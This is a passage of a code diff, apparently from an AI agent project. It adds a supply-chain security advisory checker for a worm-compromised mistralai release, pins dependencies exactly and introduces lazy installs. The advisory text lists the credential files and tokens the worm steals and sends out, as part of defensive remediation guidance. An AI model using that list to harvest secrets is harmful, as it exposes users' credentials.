+    return True
 
 
 # Matches every character that MarkdownV2 requires to be backslash-escaped
diff --git a/gateway/run.py b/gateway/run.py
index 1da45e3f03f..559adae89bf 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -3275,6 +3275,30 @@ class GatewayRunner:
             write_runtime_status(gateway_state="starting", exit_reason=None)
         except Exception:
             pass
+
+        # Log any active supply-chain security advisories. Operators see this
+        # in gateway.log and `hermes status` surfaces it; we do NOT block
+        # startup or surface it inline to user messages, since the gateway
+        # operator is the one who can act on it (uninstall the package,
+        # rotate credentials).  See hermes_cli/security_advisories.py.
+        try:
+            from hermes_cli.security_advisories import (
+                detect_compromised,
+                gateway_log_message,
+            )
+            _adv_hits = detect_compromised()
+            _adv_msg = gateway_log_message(_adv_hits)
+            if _adv_msg:
+                logger.warning("%s", _adv_msg)
+                logger.warning(
+                    "Run `hermes doctor` on the gateway host for full "
+                    "remediation steps."
+                )
+        except Exception:
+            logger.debug(
+                "security advisory check failed at gateway startup",
+                exc_info=True,
+            )
         
         # Warn if no user allowlists are configured and open access is not opted in
         _builtin_allowed_vars = (
diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index 37fd0536cef..d7585dc3010 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -1332,6 +1332,21 @@ DEFAULT_CONFIG = {
             "domains": [],
             "shared_files": [],
         },
+        # Acknowledged supply-chain security advisories. Each entry is the
+        # ID of an advisory the user has read and acted on (uninstalled the
+        # compromised package, rotated credentials). Acked advisories no
+        # longer trigger the startup banner. Add via `hermes doctor --ack
+        # <id>`; remove by editing the list directly. See
+        # ``hermes_cli/security_advisories.py`` for the catalog.
+        "acked_advisories": [],
+        # Allow Hermes to lazy-install opt-in backend packages from PyPI
+        # the first time the user enables a backend that needs them
+        # (e.g. installing ``elevenlabs`` when the user picks ElevenLabs as
+        # their TTS provider). Set to false to require explicit
+        # ``pip install`` for everything beyond the base set — appropriate
+        # for restricted networks, audited environments, or air-gapped
+        # systems where any runtime install is unacceptable.
+        "allow_lazy_installs": True,
     },
 
     "cron": {
diff --git a/hermes_cli/doctor.py b/hermes_cli/doctor.py
index 13f58a8509f..529433902d5 100644
--- a/hermes_cli/doctor.py
+++ b/hermes_cli/doctor.py
@@ -296,19 +296,101 @@ def _build_apikey_providers_list() -> list:
 def run_doctor(args):
     """Run diagnostic checks."""
     should_fix = getattr(args, 'fix', False)
+    ack_target = getattr(args, 'ack', None)
 
     # Doctor runs from the interactive CLI, so CLI-gated tool availability
     # checks (like cronjob management) should see the same context as `hermes`.
     os.environ.setdefault("HERMES_INTERACTIVE", "1")
-    
+
+    # Handle `hermes doctor --ack <id>` as a fast path. Persist the ack and
+    # return without running the rest of the diagnostics — the user has
+    # already seen the advisory and just wants to silence it.
+    if ack_target:
+        from hermes_cli.security_advisories import (
+            ADVISORIES,
+            ack_advisory,
+        )
+        valid_ids = {a.id for a in ADVISORIES}
+        if ack_target not in valid_ids:
+            print(color(
+                f"Unknown advisory ID: {ack_target!r}. Known IDs: "
+                f"{', '.join(sorted(valid_ids)) or '(none)'}",
+                Colors.RED,
+            ))
+            sys.exit(2)
+        if ack_advisory(ack_target):
+            print(color(
+                f"  ✓ Acknowledged advisory {ack_target}. "
+                f"It will no longer trigger startup banners.",
+                Colors.GREEN,
+            ))
+        else:
+            print(color(
+                f"  ✗ Failed to persist ack for {ack_target}. "
+                f"Check ~/.hermes/config.yaml is writable.",
+                Colors.RED,
+            ))
+            sys.exit(1)
+        return
+
     issues = []
     manual_issues = []  # issues that can't be auto-fixed
     fixed_count = 0
-    
+
     print()
     print(color("┌─────────────────────────────────────────────────────────┐", Colors.CYAN))
     print(color("│                 🩺 Hermes Doctor                        │", Colors.CYAN))
     print(color("└─────────────────────────────────────────────────────────┘", Colors.CYAN))
+
+    # =========================================================================
+    # Check: Security advisories  (RUNS FIRST — these are the most urgent)
+    # =========================================================================
+    print()
+    print(color("◆ Security Advisories", Colors.CYAN, Colors.BOLD))
+    try:
+        from hermes_cli.security_advisories import (
+            detect_compromised,
+            filter_unacked,
+            full_remediation_text,
+            get_acked_ids,
+        )
+        all_hits = detect_compromised()
+        fresh_hits = filter_unacked(all_hits)
+        if fresh_hits:
+            for hit in fresh_hits:
+                check_fail(
+                    f"{hit.advisory.title}",
+                    f"({hit.package}=={hit.installed_version})",
+                )
+                # Print the full remediation block, indented under the
+                # check_fail header so it reads as a single section.
+                for line in full_remediation_text(hit):
+                    if line:
+                        print(f"    {color(line, Colors.YELLOW)}")
+                    else:
+                        print()
+                # Funnel into the action list so the summary block surfaces it
+                # for users who scroll past the section.
+                manual_issues.append(
+                    f"Resolve security advisory {hit.advisory.id}: "
+                    f"uninstall {hit.package}=={hit.installed_version} and "
+                    f"rotate credentials, then run "
+                    f"`hermes doctor --ack {hit.advisory.id}`."
+                )
+            # Acked-but-still-installed: show as informational so the user
+            # knows the package is still on disk after the ack.
+            acked_ids = get_acked_ids()
+            for h in all_hits:
+                if h.advisory.id in acked_ids:
+                    check_warn(
+                        f"{h.package}=={h.installed_version} still installed "
+                        f"(advisory {h.advisory.id} acknowledged)",
+                    )
+        else:
+            check_ok("No active security advisories")
+    except Exception as e:
+        # Never let a bug in the advisory check block the rest of doctor.
+        check_warn(f"Security advisory check failed: {e}")
     
     # =========================================================================
     # Check: Python version
diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index 3c0ab4c442a..33f915a9e6b 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -10086,6 +10086,16 @@ def main():
     doctor_parser.add_argument(
         "--fix", action="store_true", help="Attempt to fix issues automatically"
     )
+    doctor_parser.add_argument(
+        "--ack",
+        metavar="ADVISORY_ID",
+        default=None,
+        help=(
+            "Acknowledge a security advisory by ID and exit. After ack, the "
+            "advisory will no longer trigger startup banners. Run `hermes "
+            "doctor` first to see active advisories and their IDs."
+        ),
+    )
     doctor_parser.set_defaults(func=cmd_doctor)
 
     # =========================================================================
diff --git a/hermes_cli/security_advisories.py b/hermes_cli/security_advisories.py
new file mode 100644
index 00000000000..311383eab4d
--- /dev/null
+++ b/hermes_cli/security_advisories.py
@@ -0,0 +1,451 @@
+"""
+Security advisory checker for Hermes Agent.
+
+Detects known-compromised Python packages installed in the active venv
+(supply-chain attacks like the Mini Shai-Hulud worm of May 2026 that
+poisoned ``mistralai 2.4.6`` on PyPI) and surfaces remediation guidance to
+the user.
+
+Design goals:
+
+- **Cheap.** A single ``importlib.metadata.version()`` call per advisory
+  package. Safe to run on every CLI startup.
+- **Loud when it matters, silent otherwise.** If no compromised package is
+  installed, the user sees nothing.
+- **Acknowledgeable.** Once the user has read and acted on an advisory they
+  can dismiss it via ``hermes doctor --ack <id>``; the ack is persisted to
+  ``config.security.acked_advisories`` and survives restart.
+- **Extensible.** Adding a new advisory is one entry in ``ADVISORIES``;
+  adding a new compromised version is a one-line edit. No code changes
+  needed when the next worm hits.
+
+The check is invoked from three places:
+
+1. ``hermes doctor`` (and ``hermes doctor --ack <id>``)
+2. CLI startup banner (one short line, then full guidance via
+   ``hermes doctor``)
+3. Gateway startup (logged to gateway.log; first interactive message gets
+   a one-line operator banner)
+
+This module is intentionally dependency-free beyond the stdlib so it can
+run in environments where the rest of Hermes failed to import.
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+import sys
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Iterable, Optional
+
+logger = logging.getLogger(__name__)
+
+
+# =============================================================================
+# Advisory catalog
+#
+# Each advisory is a community-facing security warning about one or more
+# specific package versions that are known to be compromised. To add a new
+# advisory:
+#
+#   1. Append a new ``Advisory`` to ``ADVISORIES`` below
+#   2. Set ``compromised`` to a tuple of ``(pkg_name, frozenset_of_versions)``
+#      — version strings must match what ``importlib.metadata.version()``
+#      returns. Use an empty frozenset to flag *any installed version*
+#      (rare; only when the maintainer namespace itself is compromised).
+#   3. Write 2-4 short ``remediation`` lines a non-expert can copy/paste.
+#
+# Do NOT remove old advisories. Once an advisory ships, leave it in place so
+# users running an older release with the compromised package still get
+# warned. Mark superseded ones via ``superseded_by`` if needed.
+# =============================================================================
+
+
+@dataclass(frozen=True)
+class Advisory:
+    """One security advisory entry.
+
+    Attributes:
+        id: stable identifier used for acks (e.g. ``shai-hulud-2026-05``).
+            Lowercase-hyphen, never reused.
+        title: one-line headline shown in banners.
+        summary: 1-3 sentence description of what was compromised and how.
+        url: reference URL (Socket advisory, GitHub advisory, PyPI page).
+        compromised: tuple of ``(package_name, frozenset_of_versions)``
+            pairs. Empty frozenset means "any version of this package is
+            considered suspect" — use sparingly.
+        remediation: ordered list of steps the user should take. First step
+            should be the uninstall command; subsequent steps the credential
+            audit / rotation guidance.
+        published: ISO date string for sort order.
+    """
+
+    id: str
+    title: str
+    summary: str
+    url: str
+    compromised: tuple[tuple[str, frozenset[str]], ...]
+    remediation: tuple[str, ...]
+    published: str = ""
+    severity: str = "high"  # low / medium / high / critical
+
+
+ADVISORIES: tuple[Advisory, ...] = (
+    Advisory(
+        id="shai-hulud-2026-05",
+        title="Mini Shai-Hulud worm — mistralai 2.4.6 compromised on PyPI",
+        summary=(
+            "PyPI quarantined the mistralai package on 2026-05-12 after a "
+            "malicious 2.4.6 release. The worm steals credentials from "
+            "environment variables and credential files (~/.npmrc, ~/.pypirc, "
+            "~/.aws/credentials, GitHub PATs, cloud SDK tokens) and exfils "
+            "them to a hardcoded webhook. If you ran any Python process that "
+            "imported mistralai 2.4.6 — including hermes when configured "
+            "with provider=mistral for TTS or STT — assume those credentials "
+            "are exposed."
+        ),
+        url="https://socket.dev/blog/mini-shai-hulud-worm-pypi",
+        compromised=(
+            ("mistralai", frozenset({"2.4.6"})),
+        ),
+        remediation=(
+            "Run: pip uninstall -y mistralai  (or: uv pip uninstall mistralai)",
+            "Rotate API keys in ~/.hermes/.env (OpenRouter, Anthropic, OpenAI, "
+            "Nous, GitHub, AWS, Google, Mistral, etc.).",
+            "Audit ~/.npmrc, ~/.pypirc, ~/.aws/credentials, ~/.config/gh/hosts.yml, "
+            "and any other credential files for tokens that may have been read.",
+            "Check GitHub for unexpected new SSH keys, deploy keys, or webhook "
+            "additions on repos you have admin on.",
+            "After cleanup: hermes doctor --ack shai-hulud-2026-05  to dismiss "
+            "this warning.",
+        ),
+        published="2026-05-12",
+        severity="critical",
+    ),
+)
+
+
+# =============================================================================
+# Detection
+# =============================================================================
+
+
+@dataclass(frozen=True)
+class AdvisoryHit:
+    """One package-version match against an advisory."""
+
+    advisory: Advisory
+    package: str
+    installed_version: str
+
+
+def _installed_version(pkg_name: str) -> Optional[str]:
+    """Return the installed version of ``pkg_name``, or None if not installed.
+
+    Uses ``importlib.metadata`` so we don't depend on pip being importable
+    inside the active venv (uv-created venvs may lack pip).
+    """
+    try:
+        from importlib.metadata import PackageNotFoundError, version
+    except ImportError:  # py<3.8 — Hermes requires 3.10+ but defensive.
+        return None
+    try:
+        return version(pkg_name)
+    except PackageNotFoundError:
+        return None
+    except Exception:
+        # Some metadata corruption modes raise ValueError or OSError. Don't
+        # let advisory checking crash the CLI startup path.
+        logger.debug("importlib.metadata.version(%s) raised", pkg_name, exc_info=True)
+        return None
+
+
+def detect_compromised(
+    advisories: Iterable[Advisory] = ADVISORIES,
+) -> list[AdvisoryHit]:
+    """Scan installed packages and return all advisory hits.
+
+    A "hit" means an advisory's listed package is installed AND the version
+    is in the compromised set (or the compromised set is empty, meaning
+    *any* version is suspect).
+    """
+    hits: list[AdvisoryHit] = []
+    for advisory in advisories:
+        for pkg_name, bad_versions in advisory.compromised:
+            installed = _installed_version(pkg_name)
+            if installed is None:
+                continue
+            if not bad_versions or installed in bad_versions:
+                hits.append(AdvisoryHit(
+                    advisory=advisory,
+                    package=pkg_name,
+                    installed_version=installed,
+                ))
+    return hits
+
+
+# =============================================================================
+# Acknowledgement persistence
+#
+# Acks live under ``security.acked_advisories`` in config.yaml as a list of
+# advisory IDs. The list is the only state — no per-host data, no
+# timestamps, no fingerprints. Users sharing a config.yaml across machines
+# (rare but possible) get the same dismissal everywhere, which is the
+# correct behavior for a global advisory.
+# =============================================================================
+
+
+def get_acked_ids() -> set[str]:
+    """Return the set of advisory IDs the user has dismissed.
+
+    Returns an empty set if config can't be loaded (don't block startup
+    just because config is broken — the advisory will keep firing until
+    config is repaired, which is fine).
+    """
+    try:
+        from hermes_cli.config import load_config
+        cfg = load_config()
+    except Exception:
+        logger.debug("Could not load config for advisory acks", exc_info=True)
+        return set()
+    sec = cfg.get("security") or {}
+    raw = sec.get("acked_advisories") or []
+    if not isinstance(raw, list):
+        return set()
+    return {str(x).strip() for x in raw if str(x).strip()}
+
+
+def ack_advisory(advisory_id: str) -> bool:
+    """Persist an ack for ``advisory_id``. Returns True on success.
+
+    Idempotent — acking an already-acked ID is a no-op.
+    """
+    advisory_id = advisory_id.strip()
+    if not advisory_id:
+        return False
+    try:
+        from hermes_cli.config import load_config, save_config
+    except Exception:
+        logger.warning("Could not import config module to persist ack")
+        return False
+    try:
+        cfg = load_config()
+        sec = cfg.setdefault("security", {})
+        existing = sec.get("acked_advisories") or []
+        if not isinstance(existing, list):
+            existing = []
+        if advisory_id not in existing:
+            existing.append(advisory_id)
+            sec["acked_advisories"] = existing
+            save_config(cfg)
+        return True
+    except Exception:
+        logger.exception("Failed to persist advisory ack for %s", advisory_id)
+        return False
+
+
+def filter_unacked(hits: list[AdvisoryHit]) -> list[AdvisoryHit]:
+    """Return only hits whose advisories the user has not dismissed."""
+    if not hits:
+        return []
+    acked = get_acked_ids()
+    return [h for h in hits if h.advisory.id not in acked]
+
+
+# =============================================================================
+# Rendering helpers
+# =============================================================================
+
+
+def _term_supports_color() -> bool:
+    if os.environ.get("NO_COLOR"):
+        return False
+    if not sys.stdout.isatty():
+        return False
+    return True
+
+
+def short_banner_lines(hits: list[AdvisoryHit]) -> list[str]:
+    """Return 1-3 short lines suitable for a startup banner.
+
+    Caller is responsible for color/styling. Always names the worst hit
+    explicitly so the user knows what's wrong without running doctor.
+    """
+    if not hits:
+        return []
+    primary = hits[0]
+    lines = [
+        f"SECURITY ADVISORY [{primary.advisory.id}]: {primary.advisory.title}",
+        f"  Detected: {primary.package}=={primary.installed_version}",
+        "  Run 'hermes doctor' for remediation steps.",
+    ]
+    if len(hits) > 1:
+        lines.insert(1, f"  ({len(hits) - 1} additional advisor"
+                       f"{'ies' if len(hits) > 2 else 'y'} also active.)")
+    return lines
+
+
+def full_remediation_text(hit: AdvisoryHit) -> list[str]:
+    """Return a multi-line block describing the advisory + remediation."""
+    a = hit.advisory
+    lines = [
+        f"=== {a.title} ===",
+        f"ID:        {a.id}    Severity: {a.severity}    Published: {a.published}",
+        f"Detected:  {hit.package}=={hit.installed_version}",
+        f"Reference: {a.url}",
+        "",
+        a.summary,
+        "",
+        "Remediation:",
+    ]
+    for i, step in enumerate(a.remediation, 1):
+        lines.append(f"  {i}. {step}")
+    return lines
+
+
+# =============================================================================
+# Startup-banner gating
+#
+# We do NOT want to hammer the user with the banner on every command. Once
+# they've seen it inside a 24h window we cache that fact in
+# ``~/.hermes/cache/advisory_banner_seen`` (a single line per advisory ID:
+# ``<id> <iso8601_timestamp>``).
+#
+# Acked advisories never re-banner. Cached-but-not-acked advisories
+# re-banner after 24h so the user doesn't fully forget.
+# =============================================================================
+
+
+_BANNER_CACHE_FILE = "advisory_banner_seen"
+_BANNER_REPEAT_HOURS = 24
+
+
+def _banner_cache_path() -> Optional[Path]:
+    try:
+        from hermes_constants import get_hermes_home
+        cache_dir = Path(get_hermes_home()) / "cache"
+        cache_dir.mkdir(parents=True, exist_ok=True)
+        return cache_dir / _BANNER_CACHE_FILE
+    except Exception:
+        return None
+
+
+def _read_banner_cache() -> dict[str, float]:
+    p = _banner_cache_path()
+    if p is None or not p.exists():
+        return {}
+    out: dict[str, float] = {}
+    try:
+        for line in p.read_text(encoding="utf-8").splitlines():
+            line = line.strip()
+            if not line:
+                continue
+            parts = line.split(None, 1)
+            if len(parts) != 2:
+                continue
+            advisory_id, ts = parts
+            try:
+                out[advisory_id] = float(ts)
+            except ValueError:
+                continue
+    except Exception:
+        return {}
+    return out
+
+
+def _write_banner_cache(seen: dict[str, float]) -> None:
+    p = _banner_cache_path()
+    if p is None:
+        return
+    try:
+        lines = [f"{aid} {ts}" for aid, ts in seen.items()]
+        p.write_text("\n".join(lines) + "\n", encoding="utf-8")
+    except Exception:
+        logger.debug("Could not write advisory banner cache", exc_info=True)
+
+
+def hits_due_for_banner(
+    hits: list[AdvisoryHit],
+    *,
+    repeat_hours: int = _BANNER_REPEAT_HOURS,
+) -> list[AdvisoryHit]:
+    """Return only hits whose banner is due (not acked, not recently shown).
+
+    Side effect: stamps the banner cache for any hit that's about to be
+    shown. Callers should subsequently render the result.
+    """
+    import time
+
+    fresh = filter_unacked(hits)
+    if not fresh:
+        return []
+    now = time.time()
+    cache = _read_banner_cache()
+    cutoff = now - (repeat_hours * 3600)
+
+    due: list[AdvisoryHit] = []
+    for hit in fresh:
+        last = cache.get(hit.advisory.id, 0.0)
+        if last < cutoff:
+            due.append(hit)
+            cache[hit.advisory.id] = now
+    if due:
+        _write_banner_cache(cache)
+    return due
+
+
+# =============================================================================
+# Public entry points used by doctor / CLI / gateway
+# =============================================================================
+
+
+def render_doctor_section(hits: list[AdvisoryHit]) -> tuple[bool, list[str]]:
+    """Render the security-advisory section for ``hermes doctor``.
+
+    Returns ``(has_problems, lines)``. Caller is responsible for printing
+    with whatever color scheme it uses.
+    """
+    fresh = filter_unacked(hits)
+    if not fresh:
+        return False, ["No active security advisories.  ✓"]
+
+    lines: list[str] = []
+    for i, hit in enumerate(fresh):
+        if i:
+            lines.append("")
+        lines.extend(full_remediation_text(hit))
+    return True, lines
+
+
+def startup_banner(hits: list[AdvisoryHit]) -> Optional[str]:
+    """Return a printable startup banner, or None if nothing is due.
+
+    Updates the banner cache as a side effect (so the next call within
+    24h returns None for the same hit).
+    """
+    due = hits_due_for_banner(hits)
+    if not due:
+        return None
+    lines = short_banner_lines(due)
+    if _term_supports_color():
+        red = "\x1b[1;31m"
+        reset = "\x1b[0m"
+        return red + "\n".join(lines) + reset
+    return "\n".join(lines)
+
+
+def gateway_log_message(hits: list[AdvisoryHit]) -> Optional[str]:
+    """Return a one-line log message for gateway operators, or None."""
+    fresh = filter_unacked(hits)
+    if not fresh:
+        return None
+    if len(fresh) == 1:
+        h = fresh[0]
+        return (f"Security advisory [{h.advisory.id}] active: "
+                f"{h.package}=={h.installed_version} matches {h.advisory.title}. "
+                f"See {h.advisory.url}")
+    return (f"{len(fresh)} security advisories active "
+            f"(IDs: {', '.join(h.advisory.id for h in fresh)}). "
+            f"Run `hermes doctor` on the gateway host for details.")
diff --git a/hermes_cli/web_server.py b/hermes_cli/web_server.py
index 2a70ee26398..f1d14ebf48b 100644
--- a/hermes_cli/web_server.py
+++ b/hermes_cli/web_server.py
@@ -56,10 +56,22 @@ try:
     from fastapi.staticfiles import StaticFiles
     from pydantic import BaseModel
 except ImportError:
-    raise SystemExit(
-        "Web UI requires fastapi and uvicorn.\n"
-        f"Install with: {sys.executable} -m pip install 'fastapi' 'uvicorn[standard]'"
-    )
+    # First try lazy-installing the dashboard extras. Only the user actually
+    # running `hermes dashboard` needs fastapi+uvicorn; lazy install keeps
+    # them out of every other install path. After install, re-import.
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("tool.dashboard", prompt=False)
+        from fastapi import FastAPI, HTTPException, Request, WebSocket, WebSocketDisconnect
+        from fastapi.middleware.cors import CORSMiddleware
+        from fastapi.responses import FileResponse, HTMLResponse, JSONResponse, Response
+        from fastapi.staticfiles import StaticFiles
+        from pydantic import BaseModel
+    except Exception:
+        raise SystemExit(
+            "Web UI requires fastapi and uvicorn.\n"
+            f"Install with: {sys.executable} -m pip install 'fastapi' 'uvicorn[standard]'"
+        )
 
 WEB_DIST = Path(os.environ["HERMES_WEB_DIST"]) if "HERMES_WEB_DIST" in os.environ else Path(__file__).parent / "web_dist"
 _log = logging.getLogger(__name__)
diff --git a/plugins/memory/hindsight/__init__.py b/plugins/memory/hindsight/__init__.py
index 20772844f16..3a42a320453 100644
--- a/plugins/memory/hindsight/__init__.py
+++ b/plugins/memory/hindsight/__init__.py
@@ -875,6 +875,13 @@ class HindsightMemoryProvider(MemoryProvider):
                         "Hindsight local runtime is unavailable"
                         + (f": {reason}" if reason else "")
                     )
+                try:
+                    from tools.lazy_deps import ensure as _lazy_ensure
+                    _lazy_ensure("memory.hindsight", prompt=False)
+                except ImportError:
+                    pass
+                except Exception as _e:
+                    raise ImportError(str(_e))
                 from hindsight import HindsightEmbedded
                 HindsightEmbedded.__del__ = lambda self: None
                 llm_provider = self._config.get("llm_provider", "")
diff --git a/plugins/memory/honcho/client.py b/plugins/memory/honcho/client.py
index 7210c6071e8..612bcd239ce 100644
--- a/plugins/memory/honcho/client.py
+++ b/plugins/memory/honcho/client.py
@@ -687,12 +687,28 @@ def get_honcho_client(config: HonchoClientConfig | None = None) -> Honcho:
             "For local instances, set HONCHO_BASE_URL instead."
         )
 
+    # Lazy-install the honcho SDK on demand. ensure() honors
+    # security.allow_lazy_installs (default true). On failure we surface
+    # the original ImportError-shape message so existing callers still get
+    # the "go run hermes honcho setup" hint they used to.
+    try:
+        from tools.lazy_deps import FeatureUnavailable, ensure as _lazy_ensure
+        _lazy_ensure("memory.honcho", prompt=False)
+    except ImportError:
+        # lazy_deps module missing — fall through to the raw import below.
+        pass
+    except Exception:
+        # FeatureUnavailable or unexpected error. Don't crash here; let the
+        # actual import attempt produce the canonical error message.
+        pass
+
     try:
         from honcho import Honcho
     except ImportError:
         raise ImportError(
             "honcho-ai is required for Honcho integration. "
-            "Install it with: pip install honcho-ai"
+            "Install it with: pip install honcho-ai  "
+            "(or run `hermes honcho setup` to configure)."
         )
 
     # Allow config.yaml honcho.base_url to override the SDK's environment
diff --git a/pyproject.toml b/pyproject.toml
index 5d164b6535f..b01a2466d64 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -11,84 +11,124 @@ requires-python = ">=3.11"
 authors = [{ name = "Nous Research" }]
 license = { text = "MIT" }
 dependencies = [
-  # Core — pinned to known-good ranges to limit supply chain attack surface
-  "openai>=2.21.0,<3",
-  "anthropic>=0.39.0,<1",
-  "python-dotenv>=1.2.1,<2",
-  "fire>=0.7.1,<1",
-  "httpx[socks]>=0.28.1,<1",
-  "rich>=14.3.3,<15",
-  "tenacity>=9.1.4,<10",
-  "pyyaml>=6.0.2,<7",
-  "ruamel.yaml>=0.18.16,<0.19",
-  "requests>=2.33.0,<3",  # CVE-2026-25645
-  "jinja2>=3.1.5,<4",
-  "pydantic>=2.12.5,<3",
+  # Core — every direct dep is exact-pinned to ==X.Y.Z (no ranges).
+  # Rationale: ranges allow PyPI to ship a fresh version of a transitive
+  # at any time without a code review on our side. Exact pins mean the
+  # only way a new package version reaches a user is via an intentional
+  # update on our end (bump the pin in this file, regenerate uv.lock).
+  # This was tightened on 2026-05-12 in response to the Mini Shai-Hulud
+  # worm hitting mistralai 2.4.6 on PyPI; if that release had been
+  # captured by `mistralai>=2.3.0,<3` rather than an exact pin, every
+  # install in the hours before the quarantine would have pulled it.
+  # See website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md.
+  #
+  # When updating: bump the version below AND regenerate uv.lock with
+  # `uv lock` so the transitive resolution stays consistent. Don't
+  # introduce ranges back without a written justification.
+  #
+  # Scope rule: only packages used by EVERY hermes session belong here.
+  # Anything that's provider-specific (`anthropic`, `firecrawl-py`,
+  # `exa-py`, `fal-client`, `edge-tts`, `parallel-web`) belongs in an
+  # extra and gets lazy-installed via `tools/lazy_deps.py` when the
+  # user picks that backend. Smaller `dependencies` = smaller blast
+  # radius for the next supply-chain attack.
+  "openai==2.24.0",
+  "python-dotenv==1.2.1",
+  "fire==0.7.1",
+  "httpx[socks]==0.28.1",
+  "rich==14.3.3",
+  "tenacity==9.1.4",
+  "pyyaml==6.0.3",
+  "ruamel.yaml==0.18.17",
+  "requests==2.33.0",  # CVE-2026-25645
+  "jinja2==3.1.6",
+  "pydantic==2.12.5",
   # Interactive CLI (prompt_toolkit is used directly by cli.py)
-  "prompt_toolkit>=3.0.52,<4",
-  # Tools
-  "exa-py>=2.9.0,<3",
-  "firecrawl-py>=4.16.0,<5",
-  "parallel-web>=0.4.2,<1",
-  "fal-client>=0.13.1,<1",
+  "prompt_toolkit==3.0.52",
   # Cron scheduler (built-in feature — scheduled cron/interval jobs use croniter).
-  "croniter>=6.0.0,<7",
-  # Text-to-speech (Edge TTS is free, no API key needed)
-  "edge-tts>=7.2.7,<8",
+  "croniter==6.0.0",
   # Skills Hub (GitHub App JWT auth — optional, only needed for bot identity)
-  "PyJWT[crypto]>=2.12.0,<3",  # CVE-2026-32597
+  "PyJWT[crypto]==2.12.1",  # CVE-2026-32597
   # Windows has no IANA tzdata shipped with the OS, so Python's ``zoneinfo``
   # (PEP 615) raises ``ZoneInfoNotFoundError`` for every non-UTC timezone
   # out of the box.  ``tzdata`` ships the Olson database as a data package
   # Python resolves automatically.  No-op on Linux/macOS (which have
   # /usr/share/zoneinfo).  Credits: PR #13182 (@sprmn24).
-  "tzdata>=2023.3; sys_platform == 'win32'",
+  "tzdata==2025.3; sys_platform == 'win32'",
   # Cross-platform process / PID management.  `psutil` is the canonical
   # answer for "is this PID alive" and process-tree walking across Linux,
   # macOS and Windows.  It replaces POSIX-only idioms like `os.kill(pid, 0)`
   # (which is a silent killer on Windows — see CONTRIBUTING.md) and
   # `os.killpg` (which doesn't exist on Windows).
-  "psutil>=5.9.0,<8",
+  "psutil==7.2.2",
 ]
 
 [project.optional-dependencies]
-modal = ["modal>=1.0.0,<2"]
-daytona = ["daytona>=0.148.0,<1"]
-vercel = ["vercel>=0.5.7,<0.6.0"]
-hindsight = ["hindsight-client>=0.4.22"]
-dev = ["debugpy>=1.8.0,<2", "pytest>=9.0.2,<10", "pytest-asyncio>=1.3.0,<2", "pytest-xdist>=3.0,<4", "pytest-split>=0.9,<1", "mcp>=1.2.0,<2", "ty>=0.0.1a29,<0.0.22", "ruff"]
-messaging = ["python-telegram-bot[webhooks]>=22.6,<23", "discord.py[voice]>=2.7.1,<3", "aiohttp>=3.13.3,<4", "slack-bolt>=1.18.0,<2", "slack-sdk>=3.27.0,<4", "qrcode>=7.0,<8"]
+# Native Anthropic provider — only needed when provider=anthropic (not via
+# OpenRouter or other aggregators).
+anthropic = ["anthropic==0.86.0"]
+# Web search backends — each only loaded when the user picks it as their
+# search provider (configured via `hermes tools` or config.yaml).
+exa = ["exa-py==2.10.2"]
+firecrawl = ["firecrawl-py==4.17.0"]
+parallel-web = ["parallel-web==0.4.2"]
+# Image generation backends
+fal = ["fal-client==0.13.1"]
+# Edge TTS — default TTS provider but still optional (users can pick
+# ElevenLabs / OpenAI / MiniMax instead).
+edge-tts = ["edge-tts==7.2.7"]
+modal = ["modal==1.3.4"]
+daytona = ["daytona==0.155.0"]
+vercel = ["vercel==0.5.7"]
+hindsight = ["hindsight-client==0.6.1"]
+dev = ["debugpy==1.8.20", "pytest==9.0.2", "pytest-asyncio==1.3.0", "pytest-xdist==3.8.0", "pytest-split==0.11.0", "mcp==1.26.0", "ty==0.0.21", "ruff==0.15.10"]
+messaging = ["python-telegram-bot[webhooks]==22.6", "discord.py[voice]==2.7.1", "aiohttp==3.13.3", "slack-bolt==1.27.0", "slack-sdk==3.40.1", "qrcode==7.4.2"]
 cron = []  # croniter is now a core dependency; this extra kept for back-compat
-slack = ["slack-bolt>=1.18.0,<2", "slack-sdk>=3.27.0,<4"]
-matrix = ["mautrix[encryption]>=0.20,<1", "Markdown>=3.6,<4", "aiosqlite>=0.20", "asyncpg>=0.29", "aiohttp-socks>=0.10,<1"]
-cli = ["simple-term-menu>=1.0,<2"]
-tts-premium = ["elevenlabs>=1.0,<2"]
+slack = ["slack-bolt==1.27.0", "slack-sdk==3.40.1"]
+matrix = ["mautrix[encryption]==0.21.0", "Markdown==3.10.2", "aiosqlite==0.22.1", "asyncpg==0.31.0", "aiohttp-socks==0.11.0"]
+cli = ["simple-term-menu==1.6.6"]
+tts-premium = ["elevenlabs==1.59.0"]
 voice = [
   # Local STT pulls in wheel-only transitive deps (ctranslate2, onnxruntime),
   # so keep it out of the base install for source-build packagers like Homebrew.
-  "faster-whisper>=1.0.0,<2",
-  "sounddevice>=0.4.6,<1",
-  "numpy>=1.24.0,<3",
+  "faster-whisper==1.2.1",
+  "sounddevice==0.5.5",
+  "numpy==2.4.3",
 ]
 pty = [
-  "ptyprocess>=0.7.0,<1; sys_platform != 'win32'",
-  "pywinpty>=2.0.0,<3; sys_platform == 'win32'",
+  "ptyprocess==0.7.0; sys_platform != 'win32'",
+  "pywinpty==2.0.15; sys_platform == 'win32'",
 ]
-honcho = ["honcho-ai>=2.0.1,<3"]
-mcp = ["mcp>=1.2.0,<2"]
-homeassistant = ["aiohttp>=3.9.0,<4"]
-sms = ["aiohttp>=3.9.0,<4"]
+honcho = ["honcho-ai==2.0.1"]
+mcp = ["mcp==1.26.0"]
+homeassistant = ["aiohttp==3.13.3"]
+sms = ["aiohttp==3.13.3"]
 # Computer use — macOS background desktop control via cua-driver (MCP stdio).
 # The cua-driver binary itself is installed via `hermes tools` post-setup
 # (curl install script); this extra just pins the MCP client used to talk
 # to it, which is already provided by the `mcp` extra.
-computer-use = ["mcp>=1.2.0,<2"]
-acp = ["agent-client-protocol>=0.9.0,<1.0"]
-mistral = ["mistralai>=2.3.0,<3"]
-bedrock = ["boto3>=1.35.0,<2"]
+computer-use = ["mcp==1.26.0"]
+acp = ["agent-client-protocol==0.9.0"]
